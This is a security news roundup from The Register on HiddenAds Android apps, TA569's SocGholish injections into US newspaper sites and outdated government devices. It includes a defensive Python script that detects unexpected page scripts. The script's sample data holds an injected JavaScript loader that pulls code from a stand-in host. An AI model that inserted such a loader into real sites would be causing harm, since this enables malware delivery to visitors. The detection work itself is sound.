More malware in the Google Play Store • The Register
A quartet of malware-laden Android apps from a single developer has been caught carrying malicious code more than once, yet the infected apps remain on Google Play and have been downloaded more than a million times.
The apps come from developer Mobile Apps Group and are infected with the trojan known as HiddenAds, security shop Malwarebytes said. It analyzed one of Mobile Apps Group's products, Bluetooth Auto Connect, which does what its name suggests but also a lot more.
According to Malwarebytes, the app waits a few days after installation to behave maliciously. Once active, the app opens phishing sites on Chrome, ranging from harmless pay-per-click spam to sites that urge users to download updates or take action because their device has been infected.
“As a result, unlocking your phone after several hours means closing multiple tabs,” said Malwarebytes’ Nathan Collier.
Interestingly, the malware in Mobile Apps Group's APKs was removed twice – in January 2021 and again the following month – when the developer uploaded clean versions of Bluetooth Auto Connect, before adding the malware back in a later update.
Collier believes the developer was likely caught by Google, which is what led to the clean uploads. Despite this, he notes that the last clean version was released on October 21, 2021, with a new malware-infected version being added to Google Play in December last year.
“In version 5.7, this malicious code remains to this day. A 10+ month run of malicious code on Google Play. Maybe it’s time to say three strikes and you’re out, Mobile Apps Group,” Collier said.
Google Play has hosted malicious apps in the past, with perhaps one of the most egregious cases coming to light last July when 60 apps installed by more than 3.3 million users were removed due to malware.
This isn’t even the first time the HiddenAds trojan has been found on Google Play: it was spotted on the store in 2020, and in 2021 a popular barcode scanning app installed on over 10 million devices was updated to include HiddenAds (a case also researched by Collier).
Google has also been accused of failing to police malware that comes preinstalled on cheap Android devices, something more than 50 advocacy groups called the company out for in 2020.
Attack on software supply chain hits US news media
Proofpoint Threat Research warns that more than 250 local and regional US newspaper websites served malicious code to readers following a software supply chain attack.
Proofpoint has been tracking TA569 for several years and warned in 2020 that it was carrying out similar attacks via HTML injection and CMS compromise. According to Proofpoint, the end goal is infection with SocGholish malware, which disguises itself as an update file for Firefox and other web browsers.
Only the infected media company running the ads has the real record showing how widespread the damage is, Proofpoint said, adding that compromised websites were found serving the Boston, New York, Chicago, Washington DC and other metro areas.
According to Proofpoint, TA569 regularly removes and adds new malicious code, “therefore the presence of the payload and malicious content can vary by the hour”, which also makes it difficult to detect.
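Because injected content of this kind appears and disappears within hours, a site operator cannot rely on a one-off scan; a scheduled comparison of the page's scripts against a known baseline is one practical defence. The following is an added example written for this article, not code from Proofpoint or the affected publishers: it extracts every `<script>` on a fetched page, flags external sources outside an allowlist of hosts and inline bodies whose hash is not in a baseline set. The hostnames, page markup and the "injected loader" snippet are all constructed sample data, and the check only sees static markup, so a script that is added purely at runtime would need a browser-based crawl to observe.

```python
"""Baseline check for unexpected <script> content on a web page.

Added example for this article (not Proofpoint's or any publisher's code).
Assumptions: the page HTML is fetched by a separate scheduled job and passed
in as text; the baseline lists the script hosts and inline-script hashes the
site expects to serve. All HTML and hostnames below are constructed samples.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []          # src values of <script src=...>
        self.inline = []            # bodies of <script>...</script>
        self._in_inline_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_inline_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline_script:
            self.inline.append("".join(self._buf))
            self._in_inline_script = False


def sha256_text(text):
    """Hash an inline script after collapsing whitespace, so a reformatting of
    known code is not reported while any change to its tokens still is."""
    normalised = " ".join(text.split())
    return hashlib.sha256(normalised.encode("utf-8")).hexdigest()


def find_unexpected_scripts(html, allowed_hosts, allowed_inline_hashes):
    """Return (kind, detail) findings for scripts the baseline does not expect.

    allowed_hosts: hostnames the site legitimately loads scripts from;
    relative src values are treated as same-origin and not reported.
    allowed_inline_hashes: sha256 hex digests of the known inline scripts.
    """
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("external", src))
    for body in parser.inline:
        digest = sha256_text(body)
        if digest not in allowed_inline_hashes:
            findings.append(("inline", digest))
    return findings


# Constructed sample: the site's own page as it should look.
KNOWN_INLINE = "window.dataLayer = window.dataLayer || [];"
BASELINE_HTML = f"""<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-news.test/player.js"></script>
<script>{KNOWN_INLINE}</script>
</head><body><p>Local news</p></body></html>"""

# Constructed sample: the same page with an injected inline loader added.
INJECTED_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script>(function(){var s=document.createElement("script");'
    's.src="https://static.injected-host.test/loader.js";'
    "document.head.appendChild(s)})();</script></head>",
)

ALLOWED_HOSTS = {"cdn.example-news.test"}           # constructed allowlist
ALLOWED_INLINE = {sha256_text(KNOWN_INLINE)}         # constructed baseline


def check_sample_pages():
    """Run the check over both constructed pages; returns (clean, injected)."""
    return (
        find_unexpected_scripts(BASELINE_HTML, ALLOWED_HOSTS, ALLOWED_INLINE),
        find_unexpected_scripts(INJECTED_HTML, ALLOWED_HOSTS, ALLOWED_INLINE),
    )


if __name__ == "__main__":
    clean, injected = check_sample_pages()
    print("baseline findings:", clean)      # expected: []
    print("injected findings:", injected)   # expected: one 'inline' finding
```

Run on a schedule and keep each run's findings with a timestamp: because the payload is rotated by the hour, a single clean result proves little, and the history of when unknown scripts appeared is what an incident responder will want.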
Almost half of US government employees use outdated mobile devices
Just under half of the mobile devices used by US officials at all levels of government run outdated operating systems, according to a report examining telemetry from more than 200 million devices.
According to security firm Lookout, this includes federal, state, and local employees across the US using outdated versions of Android and iOS on their devices, with far worse numbers being reported for Android.
Ten months after Android 12 was released, only 67 percent of federal devices and 54 percent of state/local devices were running the current version. Android 11 was on about 15 percent of devices at all levels of government, while more than 10 percent of state and local devices were still running Android 9.
The only large group of iOS devices not running iOS 15 (the latest version during the data period) were state and local devices, about a quarter of which were still running iOS 14 ten months after iOS 15 was released.
But cybercriminals looking to access government devices are turning away from malware and toward simply collecting credentials, meaning these legacy operating systems may not be responsible for threat actors gaining a foothold in US government agencies.
About 50 percent of phishing attacks targeting government employees attempted to steal credentials, up from about a third a year earlier, Lookout said. One piece of good news from the report is that government officials appear to be learning from phishing.
“Well over 50 percent of federal, state, and local employees who received a notification that they clicked a phishing link did not click a subsequent mobile phishing link.” ®
https://www.theregister.com/2022/11/07/in_brief_security/